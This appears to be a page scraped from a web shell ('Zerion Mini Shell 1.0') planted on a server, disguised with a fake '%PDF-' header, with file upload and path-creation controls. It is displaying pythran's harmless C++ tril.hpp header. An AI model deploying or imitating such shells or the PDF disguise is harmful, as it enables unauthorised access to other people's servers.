%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /lib/python3/dist-packages/pythran/pythonic/numpy/
Upload File :
Create Path :
Current File : //lib/python3/dist-packages/pythran/pythonic/numpy/tril.hpp

#ifndef PYTHONIC_NUMPY_TRIL_HPP
#define PYTHONIC_NUMPY_TRIL_HPP

#include "pythonic/include/numpy/tril.hpp"

#include "pythonic/utils/functor.hpp"
#include "pythonic/utils/numpy_conversion.hpp"
#include "pythonic/types/ndarray.hpp"

PYTHONIC_NS_BEGIN

namespace numpy
{
  template <class T, class pS>
  types::ndarray<T, pS> tril(types::ndarray<T, pS> const &expr, int k)
  {
    types::ndarray<T, pS> out(expr._shape, builtins::None);
    for (int i = 0; i < std::get<0>(expr._shape); ++i) {
      auto out_i = out[i];
      auto expr_i = expr[i];
      for (long j = 0; j < std::get<1>(expr._shape); ++j)
        if (j - i <= k)
          out_i[j] = expr_i[j];
        else
          out_i[j] = 0;
    }
    return out;
  }

  NUMPY_EXPR_TO_NDARRAY0_IMPL(tril)
}
PYTHONIC_NS_END

#endif

Zerion Mini Shell 1.0